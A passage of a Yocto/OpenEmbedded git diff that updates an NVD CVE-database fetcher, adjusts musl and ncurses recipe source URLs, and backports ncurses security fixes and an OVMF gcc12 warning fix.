+        attempts = int(d.getVar("CVE_DB_UPDATE_ATTEMPTS"))
+
+        # Recommended by NVD
+        wait_time = 6
+        if api_key:
+            wait_time = 2
+
+        while True:
+            req_args['startIndex'] = index
+            raw_data = nvd_request_next(url, attempts, api_key, req_args, wait_time)
+            if raw_data is None:
+                # We haven't managed to download data
+                return False
+
+            data = json.loads(raw_data)
+
+            index = data["startIndex"]
+            total = data["totalResults"]
+            per_page = data["resultsPerPage"]
+            bb.note("Got %d entries" % per_page)
+            for cve in data["vulnerabilities"]:
+               update_db(conn, cve)
+
+            index += per_page
+            ph.update((float(index) / (total+1)) * 100)
+            if index >= total:
+               break
+
+            # Recommended by NVD
+            time.sleep(wait_time)
+
+        # Update success, set the date to cve_check file.
+        cve_f.write('CVE database update : %s\n\n' % datetime.date.today())
+
+    conn.commit()
+    conn.close()
+    return True
+
+def initialize_db(conn):
+    with conn:
+        c = conn.cursor()
+
+        c.execute("CREATE TABLE IF NOT EXISTS META (YEAR INTEGER UNIQUE, DATE TEXT)")
+
+        c.execute("CREATE TABLE IF NOT EXISTS NVD (ID TEXT UNIQUE, SUMMARY TEXT, \
+            SCOREV2 TEXT, SCOREV3 TEXT, MODIFIED INTEGER, VECTOR TEXT)")
+
+        c.execute("CREATE TABLE IF NOT EXISTS PRODUCTS (ID TEXT, \
+            VENDOR TEXT, PRODUCT TEXT, VERSION_START TEXT, OPERATOR_START TEXT, \
+            VERSION_END TEXT, OPERATOR_END TEXT)")
+        c.execute("CREATE INDEX IF NOT EXISTS PRODUCT_ID_IDX on PRODUCTS(ID);")
+
+        c.close()
+
+def parse_node_and_insert(conn, node, cveId):
+
+    def cpe_generator():
+        for cpe in node.get('cpeMatch', ()):
+            if not cpe['vulnerable']:
+                return
+            cpe23 = cpe.get('criteria')
+            if not cpe23:
+                return
+            cpe23 = cpe23.split(':')
+            if len(cpe23) < 6:
+                return
+            vendor = cpe23[3]
+            product = cpe23[4]
+            version = cpe23[5]
+
+            if cpe23[6] == '*' or cpe23[6] == '-':
+                version_suffix = ""
+            else:
+                version_suffix = "_" + cpe23[6]
+
+            if version != '*' and version != '-':
+                # Version is defined, this is a '=' match
+                yield [cveId, vendor, product, version + version_suffix, '=', '', '']
+            elif version == '-':
+                # no version information is available
+                yield [cveId, vendor, product, version, '', '', '']
+            else:
+                # Parse start version, end version and operators
+                op_start = ''
+                op_end = ''
+                v_start = ''
+                v_end = ''
+
+                if 'versionStartIncluding' in cpe:
+                    op_start = '>='
+                    v_start = cpe['versionStartIncluding']
+
+                if 'versionStartExcluding' in cpe:
+                    op_start = '>'
+                    v_start = cpe['versionStartExcluding']
+
+                if 'versionEndIncluding' in cpe:
+                    op_end = '<='
+                    v_end = cpe['versionEndIncluding']
+
+                if 'versionEndExcluding' in cpe:
+                    op_end = '<'
+                    v_end = cpe['versionEndExcluding']
+
+                if op_start or op_end or v_start or v_end:
+                    yield [cveId, vendor, product, v_start, op_start, v_end, op_end]
+                else:
+                    # This is no version information, expressed differently.
+                    # Save processing by representing as -.
+                    yield [cveId, vendor, product, '-', '', '', '']
+
+    conn.executemany("insert into PRODUCTS values (?, ?, ?, ?, ?, ?, ?)", cpe_generator()).close()
+
+def update_db(conn, elt):
+    """
+    Update a single entry in the on-disk database
+    """
+
+    accessVector = None
+    cveId = elt['cve']['id']
+    if elt['cve']['vulnStatus'] ==  "Rejected":
+        c = conn.cursor()
+        c.execute("delete from PRODUCTS where ID = ?;", [cveId])
+        c.execute("delete from NVD where ID = ?;", [cveId])
+        c.close()
+        return
+    cveDesc = ""
+    for desc in elt['cve']['descriptions']:
+        if desc['lang'] == 'en':
+            cveDesc = desc['value']
+    date = elt['cve']['lastModified']
+    try:
+        accessVector = elt['cve']['metrics']['cvssMetricV2'][0]['cvssData']['accessVector']
+        cvssv2 = elt['cve']['metrics']['cvssMetricV2'][0]['cvssData']['baseScore']
+    except KeyError:
+        cvssv2 = 0.0
+    cvssv3 = None
+    try:
+        accessVector = accessVector or elt['cve']['metrics']['cvssMetricV30'][0]['cvssData']['attackVector']
+        cvssv3 = elt['cve']['metrics']['cvssMetricV30'][0]['cvssData']['baseScore']
+    except KeyError:
+        pass
+    try:
+        accessVector = accessVector or elt['cve']['metrics']['cvssMetricV31'][0]['cvssData']['attackVector']
+        cvssv3 = cvssv3 or elt['cve']['metrics']['cvssMetricV31'][0]['cvssData']['baseScore']
+    except KeyError:
+        pass
+    accessVector = accessVector or "UNKNOWN"
+    cvssv3 = cvssv3 or 0.0
+
+    conn.execute("insert or replace into NVD values (?, ?, ?, ?, ?, ?)",
+                [cveId, cveDesc, cvssv2, cvssv3, date, accessVector]).close()
+
+    try:
+        # Remove any pre-existing CVE configuration. Even for partial database
+        # update, those will be repopulated. This ensures that old
+        # configuration is not kept for an updated CVE.
+        conn.execute("delete from PRODUCTS where ID = ?", [cveId]).close()
+        for config in elt['cve']['configurations']:
+            # This is suboptimal as it doesn't handle AND/OR and negate, but is better than nothing
+            for node in config["nodes"]:
+                parse_node_and_insert(conn, node, cveId)
+    except KeyError:
+        bb.note("CVE %s has no configurations" % cveId)
+
+do_fetch[nostamp] = "1"
+
+EXCLUDE_FROM_WORLD = "1"
diff --git a/meta/recipes-core/musl/libucontext_git.bb b/meta/recipes-core/musl/libucontext_git.bb
index ec988f1920..71beb80083 100644
--- a/meta/recipes-core/musl/libucontext_git.bb
+++ b/meta/recipes-core/musl/libucontext_git.bb
@@ -10,7 +10,7 @@ DEPENDS = ""
 
 PV = "0.10+${SRCPV}"
 SRCREV = "19fa1bbfc26efb92147b5e85cc0ca02a0e837561"
-SRC_URI = "git://github.com/kaniini/libucontext \
+SRC_URI = "git://github.com/kaniini/libucontext;branch=master;protocol=https \
 "
 
 S = "${WORKDIR}/git"
diff --git a/meta/recipes-core/musl/musl-obstack.bb b/meta/recipes-core/musl/musl-obstack.bb
index 3003935fe5..74de48c2cd 100644
--- a/meta/recipes-core/musl/musl-obstack.bb
+++ b/meta/recipes-core/musl/musl-obstack.bb
@@ -10,7 +10,7 @@ SECTION = "libs"
 
 PV = "1.1"
 SRCREV = "d2ad66b0df44a4b784956f7f7f2717131ddc05f4"
-SRC_URI = "git://github.com/pullmoll/musl-obstack"
+SRC_URI = "git://github.com/pullmoll/musl-obstack;branch=master;protocol=https"
 
 UPSTREAM_CHECK_COMMITS = "1"
 
diff --git a/meta/recipes-core/musl/musl-utils.bb b/meta/recipes-core/musl/musl-utils.bb
index dd0ce33061..c30509469c 100644
--- a/meta/recipes-core/musl/musl-utils.bb
+++ b/meta/recipes-core/musl/musl-utils.bb
@@ -11,7 +11,7 @@ SECTION = "utils"
 PV = "20170421"
 
 SRCREV = "fb5630138ccabbbc14a19d372096a04e42573c7d"
-SRC_URI = "git://github.com/boltlinux/musl-utils"
+SRC_URI = "git://github.com/boltlinux/musl-utils;branch=master;protocol=https"
 
 UPSTREAM_CHECK_COMMITS = "1"
 
diff --git a/meta/recipes-core/musl/musl_git.bb b/meta/recipes-core/musl/musl_git.bb
index 82379fd1c5..cbb56f4769 100644
--- a/meta/recipes-core/musl/musl_git.bb
+++ b/meta/recipes-core/musl/musl_git.bb
@@ -12,7 +12,7 @@ PV = "${BASEVER}+git${SRCPV}"
 
 # mirror is at git://github.com/kraj/musl.git
 
-SRC_URI = "git://git.musl-libc.org/musl \
+SRC_URI = "git://git.musl-libc.org/musl;branch=master \
            file://0001-Make-dynamic-linker-a-relative-symlink-to-libc.patch \
            file://0002-ldso-Use-syslibdir-and-libdir-as-default-pathes-to-l.patch \
           "
diff --git a/meta/recipes-core/ncurses/files/0003-gen-pkgconfig.in-Do-not-include-LDFLAGS-in-generated.patch b/meta/recipes-core/ncurses/files/0003-gen-pkgconfig.in-Do-not-include-LDFLAGS-in-generated.patch
new file mode 100644
index 0000000000..1eb17767a0
--- /dev/null
+++ b/meta/recipes-core/ncurses/files/0003-gen-pkgconfig.in-Do-not-include-LDFLAGS-in-generated.patch
@@ -0,0 +1,29 @@
+From 3b3e87934bb6d8511261d7c3d6e39b4f71849272 Mon Sep 17 00:00:00 2001
+From: Nathan Rossi <nathan@nathanrossi.com>
+Date: Mon, 14 Dec 2020 13:39:02 +1000
+Subject: [PATCH] gen-pkgconfig.in: Do not include LDFLAGS in generated pc
+ files
+
+Including the LDFLAGS in the pkgconfig output is problematic as OE
+includes build host specific paths and options (e.g. uninative and
+'-Wl,--dynamic-linker=').
+
+Upstream-Status: Inappropriate [OE Specific]
+Signed-off-by: Nathan Rossi <nathan@nathanrossi.com>
+---
+ misc/gen-pkgconfig.in | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/misc/gen-pkgconfig.in b/misc/gen-pkgconfig.in
+index 8f00b824b9..009d215663 100644
+--- a/misc/gen-pkgconfig.in
++++ b/misc/gen-pkgconfig.in
+@@ -80,7 +80,7 @@ if [ "$includedir" != "/usr/include" ]; then
+ fi
+ 
+ lib_flags=
+-for opt in -L$libdir @LDFLAGS@ @EXTRA_LDFLAGS@ @LIBS@
++for opt in -L$libdir @LIBS@
+ do
+ 	case $opt in
+ 	-l*) # LIBS is handled specially below
diff --git a/meta/recipes-core/ncurses/files/CVE-2021-39537.patch b/meta/recipes-core/ncurses/files/CVE-2021-39537.patch
new file mode 100644
index 0000000000..7655200350
--- /dev/null
+++ b/meta/recipes-core/ncurses/files/CVE-2021-39537.patch
@@ -0,0 +1,30 @@
+$NetBSD: patch-ncurses_tinfo_captoinfo.c,v 1.1 2021/10/09 07:52:36 wiz Exp $
+
+Fix for CVE-2021-39537 from upstream:
+https://github.com/ThomasDickey/ncurses-snapshots/commit/63ca9e061f4644795d6f3f559557f3e1ed8c738b#diff-7e95c7bc5f213e9be438e69a9d5d0f261a14952bcbd692f7b9014217b8047340
+
+CVE: CVE-2021-39537
+Upstream-Status: Backport [http://cvsweb.netbsd.org/bsdweb.cgi/pkgsrc/devel/ncurses/patches/Attic/patch-ncurses_tinfo_captoinfo.c?rev=1.1&content-type=text/x-cvsweb-markup]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+--- a/ncurses/tinfo/captoinfo.c 2020-02-02 23:34:34.000000000 +0000
++++ b/ncurses/tinfo/captoinfo.c
+@@ -216,12 +216,15 @@ cvtchar(register const char *sp)
+ 	}
+ 	break;
+     case '^':
++	len = 2;
+ 	c = UChar(*++sp);
+-	if (c == '?')
++        if (c == '?') {
+ 	    c = 127;
+-	else
++        } else if (c == '\0') {
++            len = 1;
++        } else {
+ 	    c &= 0x1f;
+-	len = 2;
++	}
+ 	break;
+     default:
+ 	c = UChar(*sp);
diff --git a/meta/recipes-core/ncurses/files/CVE-2022-29458.patch b/meta/recipes-core/ncurses/files/CVE-2022-29458.patch
new file mode 100644
index 0000000000..eb1b7c96f9
--- /dev/null
+++ b/meta/recipes-core/ncurses/files/CVE-2022-29458.patch
@@ -0,0 +1,135 @@
+From 5f40697e37e195069f55528fc7a1d77e619ad104 Mon Sep 17 00:00:00 2001
+From: Dan Tran <dantran@microsoft.com>
+Date: Fri, 13 May 2022 13:28:41 -0700
+Subject: [PATCH] ncurses 6.3 before patch 20220416 has an out-of-bounds read
+ and segmentation violation in convert_strings in tinfo/read_entry.c in the
+ terminfo library.
+
+CVE: CVE-2022-29458
+Upstream-Status: Backport
+[https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1009870]
+
+Signed-off-by: Gustavo Lima Chaves <gustavo.chaves@microsoft.com>
+Signed-off-by: Dan Tran <dantran@microsoft.com>
+---
+ ncurses/tinfo/alloc_entry.c | 14 ++++++--------
+ ncurses/tinfo/read_entry.c  | 25 +++++++++++++++++++------
+ 2 files changed, 25 insertions(+), 14 deletions(-)
+
+diff --git a/ncurses/tinfo/alloc_entry.c b/ncurses/tinfo/alloc_entry.c
+index 4bf7d6c8..b49ad6aa 100644
+--- a/ncurses/tinfo/alloc_entry.c
++++ b/ncurses/tinfo/alloc_entry.c
+@@ -48,13 +48,11 @@
+ 
+ #include <tic.h>
+ 
+-MODULE_ID("$Id: alloc_entry.c,v 1.64 2020/02/02 23:34:34 tom Exp $")
++MODULE_ID("$Id: alloc_entry.c,v 1.69 2022/04/16 22:46:53 tom Exp $")
+ 
+ #define ABSENT_OFFSET    -1
+ #define CANCELLED_OFFSET -2
+ 
+-#define MAX_STRTAB	4096	/* documented maximum entry size */
+-
+ static char *stringbuf;		/* buffer for string capabilities */
+ static size_t next_free;	/* next free character in stringbuf */
+ 
+@@ -71,8 +69,8 @@ _nc_init_entry(ENTRY * const tp)
+     }
+ #endif
+ 
+-    if (stringbuf == 0)
+-	TYPE_MALLOC(char, (size_t) MAX_STRTAB, stringbuf);
++    if (stringbuf == NULL)
++	TYPE_MALLOC(char, (size_t) MAX_ENTRY_SIZE, stringbuf);
+ 
+     next_free = 0;
+ 
+@@ -108,11 +106,11 @@ _nc_save_str(const char *const string)
+ 	 * Cheat a little by making an empty string point to the end of the
+ 	 * previous string.
+ 	 */
+-	if (next_free < MAX_STRTAB) {
++	if (next_free < MAX_ENTRY_SIZE) {
+ 	    result = (stringbuf + next_free - 1);
+ 	}
+-    } else if (next_free + len < MAX_STRTAB) {
+-	_nc_STRCPY(&stringbuf[next_free], string, MAX_STRTAB);
++    } else if (next_free + len < MAX_ENTRY_SIZE) {
++	_nc_STRCPY(&stringbuf[next_free], string, MAX_ENTRY_SIZE);
+ 	DEBUG(7, ("Saved string %s", _nc_visbuf(string)));
+ 	DEBUG(7, ("at location %d", (int) next_free));
+ 	next_free += len;
+diff --git a/ncurses/tinfo/read_entry.c b/ncurses/tinfo/read_entry.c
+index 5b570b0f..23c2cebc 100644
+--- a/ncurses/tinfo/read_entry.c
++++ b/ncurses/tinfo/read_entry.c
+@@ -1,5 +1,5 @@
+ /****************************************************************************
+- * Copyright 2018-2019,2020 Thomas E. Dickey                                *
++ * Copyright 2018-2021,2022 Thomas E. Dickey                                *
+  * Copyright 1998-2016,2017 Free Software Foundation, Inc.                  *
+  *                                                                          *
+  * Permission is hereby granted, free of charge, to any person obtaining a  *
+@@ -42,7 +42,7 @@
+ 
+ #include <tic.h>
+ 
+-MODULE_ID("$Id: read_entry.c,v 1.157 2020/02/02 23:34:34 tom Exp $")
++MODULE_ID("$Id: read_entry.c,v 1.162 2022/04/16 21:00:00 tom Exp $")
+ 
+ #define TYPE_CALLOC(type,elts) typeCalloc(type, (unsigned)(elts))
+ 
+@@ -145,6 +145,7 @@ convert_strings(char *buf, char **Strings, int count, int size, char *table)
+ {
+     int i;
+     char *p;
++    bool corrupt = FALSE;
+ 
+     for (i = 0; i < count; i++) {
+ 	if (IS_NEG1(buf + 2 * i)) {
+@@ -154,8 +155,20 @@ convert_strings(char *buf, char **Strings, int count, int size, char *table)
+ 	} else if (MyNumber(buf + 2 * i) > size) {
+ 	    Strings[i] = ABSENT_STRING;
+ 	} else {
+-	    Strings[i] = (MyNumber(buf + 2 * i) + table);
+-	    TR(TRACE_DATABASE, ("Strings[%d] = %s", i, _nc_visbuf(Strings[i])));
++	    int nn = MyNumber(buf + 2 * i);
++	    if (nn >= 0 && nn < size) {
++		Strings[i] = (nn + table);
++		TR(TRACE_DATABASE, ("Strings[%d] = %s", i,
++				    _nc_visbuf(Strings[i])));
++	    } else {
++		if (!corrupt) {
++		    corrupt = TRUE;
++		    TR(TRACE_DATABASE,
++		       ("ignore out-of-range index %d to Strings[]", nn));
++		    _nc_warning("corrupt data found in convert_strings");
++		}
++		Strings[i] = ABSENT_STRING;
++	    }
+ 	}
+ 
+ 	/* make sure all strings are NUL terminated */
+@@ -776,7 +789,7 @@ _nc_read_tic_entry(char *filename,
+ 	 * looking for compiled (binary) terminfo data.
+ 	 *
+ 	 * cgetent uses a two-level lookup.  On the first it uses the given
+-	 * name to return a record containing only the aliases for an entry. 
++	 * name to return a record containing only the aliases for an entry.
+ 	 * On the second (using that list of aliases as a key), it returns the
+ 	 * content of the terminal description.  We expect second lookup to
+ 	 * return data beginning with the same set of aliases.
+@@ -833,7 +846,7 @@ _nc_read_tic_entry(char *filename,
+ #endif /* NCURSES_USE_DATABASE */
+ 
+ /*
+- * Find and read the compiled entry for a given terminal type, if it exists. 
++ * Find and read the compiled entry for a given terminal type, if it exists.
+  * We take pains here to make sure no combination of environment variables and
+  * terminal type name can be used to overrun the file buffer.
+  */
+-- 
+2.36.1
+
diff --git a/meta/recipes-core/ncurses/files/CVE-2023-29491.patch b/meta/recipes-core/ncurses/files/CVE-2023-29491.patch
new file mode 100644
index 0000000000..0a0497723f
--- /dev/null
+++ b/meta/recipes-core/ncurses/files/CVE-2023-29491.patch
@@ -0,0 +1,45 @@
+Backport of:
+
+Author: Sven Joachim <svenjoac@gmx.de>
+Description: Change the --disable-root-environ configure option behavior
+ By default, the --disable-root-environ option forbids program run by
+ the superuser to load custom terminfo entries.  This patch changes
+ that to only restrict programs running with elevated privileges,
+ matching the behavior of the --disable-setuid-environ option
+ introduced in the 20230423 upstream patchlevel.
+Bug-Debian: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1034372#29
+Bug: https://lists.gnu.org/archive/html/bug-ncurses/2023-04/msg00018.html
+Forwarded: not-needed
+Last-Update: 2023-05-01
+
+Upstream-Status: Backport [https://launchpad.net/ubuntu/+archive/primary/+sourcefiles/ncurses/6.2-0ubuntu2.1/ncurses_6.2-0ubuntu2.1.debian.tar.xz]
+CVE: CVE-2023-29491
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+
+---
+ ncurses/tinfo/access.c |    2 --
+ 1 file changed, 2 deletions(-)
+
+--- a/ncurses/tinfo/access.c
++++ b/ncurses/tinfo/access.c
+@@ -178,15 +178,16 @@ _nc_is_file_path(const char *path)
+ NCURSES_EXPORT(int)
+ _nc_env_access(void)
+ {
++    int result = TRUE;
++
+ #if HAVE_ISSETUGID
+     if (issetugid())
+-	return FALSE;
++	result = FALSE;
+ #elif HAVE_GETEUID && HAVE_GETEGID
+     if (getuid() != geteuid()
+ 	|| getgid() != getegid())
+-	return FALSE;
++	result = FALSE;
+ #endif
+-    /* ...finally, disallow root */
+-    return (getuid() != ROOT_UID) && (geteuid() != ROOT_UID);
++    return result;
+ }
+ #endif
diff --git a/meta/recipes-core/ncurses/files/CVE-2023-50495.patch b/meta/recipes-core/ncurses/files/CVE-2023-50495.patch
new file mode 100644
index 0000000000..58c23866d1
--- /dev/null
+++ b/meta/recipes-core/ncurses/files/CVE-2023-50495.patch
@@ -0,0 +1,79 @@
+Fix for CVE-2023-50495 from upstream:
+https://github.com/ThomasDickey/ncurses-snapshots/commit/efe9674ee14b14b788f9618941f97d31742f0adc
+
+Reference:
+https://invisible-island.net/archives/ncurses/6.4/ncurses-6.4-20230424.patch.gz
+
+Upstream-Status: Backport [import from suse ftp.pbone.net/mirror/ftp.opensuse.org/update/leap-micro/5.3/sle/src/ncurses-6.1-150000.5.20.1.src.rpm
+Upstream commit https://github.com/ThomasDickey/ncurses-snapshots/commit/efe9674ee14b14b788f9618941f97d31742f0adc]
+CVE: CVE-2023-50495
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ ncurses/tinfo/parse_entry.c | 23 ++++++++++++++++-------
+ 1 file changed, 16 insertions(+), 7 deletions(-)
+
+diff --git a/ncurses/tinfo/parse_entry.c b/ncurses/tinfo/parse_entry.c
+index 23574b66..56ba9ae6 100644
+--- a/ncurses/tinfo/parse_entry.c
++++ b/ncurses/tinfo/parse_entry.c
+@@ -110,7 +110,7 @@ _nc_extend_names(ENTRY * entryp, const char *name, int token_type)
+ 	/* Well, we are given a cancel for a name that we don't recognize */
+ 	return _nc_extend_names(entryp, name, STRING);
+     default:
+-	return 0;
++	return NULL;
+     }
+ 
+     /* Adjust the 'offset' (insertion-point) to keep the lists of extended
+@@ -142,6 +142,11 @@ _nc_extend_names(ENTRY * entryp, const char *name, int token_type)
+ 	for (last = (unsigned) (max - 1); last > tindex; last--)
+ 
+     if (!found) {
++	char *saved;
++
++	if ((saved = _nc_save_str(name)) == NULL)
++	    return NULL;
++
+ 	switch (token_type) {
+ 	case BOOLEAN:
+ 	    tp->ext_Booleans++;
+@@ -169,7 +174,7 @@ _nc_extend_names(ENTRY * entryp, const char *name, int token_type)
+ 	TYPE_REALLOC(char *, actual, tp->ext_Names);
+ 	while (--actual > offset)
+ 	    tp->ext_Names[actual] = tp->ext_Names[actual - 1];
+-	tp->ext_Names[offset] = _nc_save_str(name);
++	tp->ext_Names[offset] = saved;
+     }
+ 
+     temp.nte_name = tp->ext_Names[offset];
+@@ -337,6 +342,8 @@ _nc_parse_entry(ENTRY * entryp, int literal, bool silent)
+ 	bool is_use = (strcmp(_nc_curr_token.tk_name, "use") == 0);
+ 	bool is_tc = !is_use && (strcmp(_nc_curr_token.tk_name, "tc") == 0);
+ 	if (is_use || is_tc) {
++	    char *saved;
++
+ 	    if (!VALID_STRING(_nc_curr_token.tk_valstring)
+ 		|| _nc_curr_token.tk_valstring[0] == '\0') {
+ 		_nc_warning("missing name for use-clause");
+@@ -350,11 +357,13 @@ _nc_parse_entry(ENTRY * entryp, int literal, bool silent)
+ 			    _nc_curr_token.tk_valstring);
+ 		continue;
+ 	    }
+-	    entryp->uses[entryp->nuses].name = _nc_save_str(_nc_curr_token.tk_valstring);
+-	    entryp->uses[entryp->nuses].line = _nc_curr_line;
+-	    entryp->nuses++;
+-	    if (entryp->nuses > 1 && is_tc) {
+-		BAD_TC_USAGE
++	    if ((saved = _nc_save_str(_nc_curr_token.tk_valstring)) != NULL) {
++		entryp->uses[entryp->nuses].name = saved;
++		entryp->uses[entryp->nuses].line = _nc_curr_line;
++		entryp->nuses++;
++		if (entryp->nuses > 1 && is_tc) {
++		    BAD_TC_USAGE
++		}
+ 	    }
+ 	} else {
+ 	    /* normal token lookup */
+-- 
+2.25.1
+
diff --git a/meta/recipes-core/ncurses/files/config.cache b/meta/recipes-core/ncurses/files/config.cache
deleted file mode 100644
index 6a9217d5bb..0000000000
--- a/meta/recipes-core/ncurses/files/config.cache
+++ /dev/null
@@ -1,4 +0,0 @@
-#! /bin/sh
-
-cf_cv_func_nanosleep=yes
-cf_cv_func_mkstemp=yes
diff --git a/meta/recipes-core/ncurses/ncurses.inc b/meta/recipes-core/ncurses/ncurses.inc
index 4156bf4f7d..ee0b15ecf0 100644
--- a/meta/recipes-core/ncurses/ncurses.inc
+++ b/meta/recipes-core/ncurses/ncurses.inc
@@ -13,10 +13,11 @@ BINCONFIG = "${bindir}/ncurses5-config ${bindir}/ncursesw5-config \
 inherit autotools binconfig-disabled multilib_header pkgconfig
 
 # Upstream has useful patches at times at ftp://invisible-island.net/ncurses/
-SRC_URI = "git://salsa.debian.org/debian/ncurses.git;protocol=https"
+SRC_URI = "git://salsa.debian.org/debian/ncurses.git;protocol=https;branch=master"
 
 EXTRA_AUTORECONF = "-I m4"
-CONFIG_SITE =+ "${WORKDIR}/config.cache"
+
+CACHED_CONFIGUREVARS = "cf_cv_func_nanosleep=yes"
 
 EXTRASITECONFIG = "CFLAGS='${CFLAGS} -I${SYSROOT_DESTDIR}${includedir}'"
 
@@ -306,7 +307,7 @@ FILES_${PN}-tools = "\
 "
 
 # 'reset' is a symlink to 'tset' which is in the 'ncurses' package
-RDEPENDS_${PN}-tools = "${PN}"
+RDEPENDS_${PN}-tools = "${PN} ${PN}-terminfo-base"
 
 FILES_${PN}-terminfo = "\
   ${datadir}/terminfo \
@@ -318,3 +319,8 @@ FILES_${PN}-terminfo-base = "\
 
 RSUGGESTS_${PN}-libtinfo = "${PN}-terminfo"
 RRECOMMENDS_${PN}-libtinfo = "${PN}-terminfo-base"
+
+# Putting terminfo into the sysroot adds around 2800 files to
+# each recipe specific sysroot. We can live without this, particularly
+# as many recipes may have native and target copies.
+SYSROOT_DIRS_remove = "${datadir}"
diff --git a/meta/recipes-core/ncurses/ncurses_6.2.bb b/meta/recipes-core/ncurses/ncurses_6.2.bb
index 723e685a9b..dbff149f55 100644
--- a/meta/recipes-core/ncurses/ncurses_6.2.bb
+++ b/meta/recipes-core/ncurses/ncurses_6.2.bb
@@ -2,12 +2,16 @@ require ncurses.inc
 
 SRC_URI += "file://0001-tic-hang.patch \
            file://0002-configure-reproducible.patch \
-           file://config.cache \
+           file://0003-gen-pkgconfig.in-Do-not-include-LDFLAGS-in-generated.patch \
+           file://CVE-2021-39537.patch \
+           file://CVE-2022-29458.patch \
+           file://CVE-2023-29491.patch \
+           file://CVE-2023-50495.patch \
            "
 # commit id corresponds to the revision in package version
 SRCREV = "a669013cd5e9d6434e5301348ea51baf306c93c4"
 S = "${WORKDIR}/git"
-EXTRA_OECONF += "--with-abi-version=5 --cache-file=${B}/config.cache"
+EXTRA_OECONF += "--with-abi-version=5 --disable-root-environ"
 UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+(\.\d+)+(\+\d+)*)"
 
 # This is needed when using patchlevel versions like 6.1+20181013
diff --git a/meta/recipes-core/os-release/os-release.bb b/meta/recipes-core/os-release/os-release.bb
index a29d678125..33f75e39b8 100644
--- a/meta/recipes-core/os-release/os-release.bb
+++ b/meta/recipes-core/os-release/os-release.bb
@@ -12,7 +12,9 @@ do_configure[noexec] = "1"
 
 # Other valid fields: BUILD_ID ID_LIKE ANSI_COLOR CPE_NAME
 #                     HOME_URL SUPPORT_URL BUG_REPORT_URL
-OS_RELEASE_FIELDS = "ID ID_LIKE NAME VERSION VERSION_ID PRETTY_NAME"
+OS_RELEASE_FIELDS = "\
+    ID ID_LIKE NAME VERSION VERSION_ID PRETTY_NAME DISTRO_CODENAME \
+"
 OS_RELEASE_UNQUOTED_FIELDS = "ID VERSION_ID VARIANT_ID"
 
 ID = "${DISTRO}"
diff --git a/meta/recipes-core/ovmf/ovmf-shell-image.bb b/meta/recipes-core/ovmf/ovmf-shell-image.bb
index 0d2b8bf52f..fd4fb5b732 100644
--- a/meta/recipes-core/ovmf/ovmf-shell-image.bb
+++ b/meta/recipes-core/ovmf/ovmf-shell-image.bb
@@ -1,4 +1,5 @@
 DESCRIPTION = "boot image with UEFI shell and tools"
+COMPATIBLE_HOST_class-target='(i.86|x86_64).*'
 
 # For this image recipe, only the wic format with a
 # single vfat partition makes sense. Because we have no
diff --git a/meta/recipes-core/ovmf/ovmf/0001-Basetools-genffs-fix-gcc12-warning.patch b/meta/recipes-core/ovmf/ovmf/0001-Basetools-genffs-fix-gcc12-warning.patch
new file mode 100644
index 0000000000..4418d52898
--- /dev/null
+++ b/meta/recipes-core/ovmf/ovmf/0001-Basetools-genffs-fix-gcc12-warning.patch
@@ -0,0 +1,49 @@
+From 7b005f344e533cd913c3ca05b266f9872df886d1 Mon Sep 17 00:00:00 2001
+From: Gerd Hoffmann <kraxel@redhat.com>
+Date: Thu, 24 Mar 2022 20:04:34 +0800
+Subject: [PATCH] BaseTools: fix gcc12 warning
+
+GenFfs.c:545:5: error: pointer ?InFileHandle? used after ?fclose? [-Werror=use-after-free]
+  545 |     Error(NULL, 0, 4001, "Resource", "memory cannot be allocated  of %s", InFileHandle);
+      |     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+GenFfs.c:544:5: note: call to ?fclose? here
+  544 |     fclose (InFileHandle);
+      |     ^~~~~~~~~~~~~~~~~~~~~
+
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+Reviewed-by: Bob Feng <bob.c.feng@intel.com>
+
+Upstream-Status: Backport [https://github.com/tianocore/edk2/commit/7b005f344e533cd913c3ca05b266f9872df886d1]
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ BaseTools/Source/C/GenFfs/GenFfs.c | 2 +-
+ BaseTools/Source/C/GenSec/GenSec.c | 2 +-
+ 2 files changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/BaseTools/Source/C/GenFfs/GenFfs.c b/BaseTools/Source/C/GenFfs/GenFfs.c
+index 949025c33325..d78d62ab3689 100644
+--- a/BaseTools/Source/C/GenFfs/GenFfs.c
++++ b/BaseTools/Source/C/GenFfs/GenFfs.c
+@@ -542,7 +542,7 @@ GetAlignmentFromFile(char *InFile, UINT32 *Alignment)
+   PeFileBuffer = (UINT8 *) malloc (PeFileSize);

+   if (PeFileBuffer == NULL) {

+     fclose (InFileHandle);

+-    Error(NULL, 0, 4001, "Resource", "memory cannot be allocated  of %s", InFileHandle);

++    Error(NULL, 0, 4001, "Resource", "memory cannot be allocated for %s", InFile);

+     return EFI_OUT_OF_RESOURCES;

+   }

+   fread (PeFileBuffer, sizeof (UINT8), PeFileSize, InFileHandle);

+diff --git a/BaseTools/Source/C/GenSec/GenSec.c b/BaseTools/Source/C/GenSec/GenSec.c
+index d54a4f9e0a7d..b1d05367ec0b 100644
+--- a/BaseTools/Source/C/GenSec/GenSec.c
++++ b/BaseTools/Source/C/GenSec/GenSec.c
+@@ -1062,7 +1062,7 @@ GetAlignmentFromFile(char *InFile, UINT32 *Alignment)
+   PeFileBuffer = (UINT8 *) malloc (PeFileSize);

+   if (PeFileBuffer == NULL) {

+     fclose (InFileHandle);

+-    Error(NULL, 0, 4001, "Resource", "memory cannot be allocated  of %s", InFileHandle);

++    Error(NULL, 0, 4001, "Resource", "memory cannot be allocated for %s", InFile);

+     return EFI_OUT_OF_RESOURCES;

+   }

+   fread (PeFileBuffer, sizeof (UINT8), PeFileSize, InFileHandle);

diff --git a/meta/recipes-core/ovmf/ovmf/0001-Basetools-lzmaenc-fix-gcc12-warning.patch b/meta/recipes-core/ovmf/ovmf/0001-Basetools-lzmaenc-fix-gcc12-warning.patch
new file mode 100644
index 0000000000..a6ef87aa79
--- /dev/null
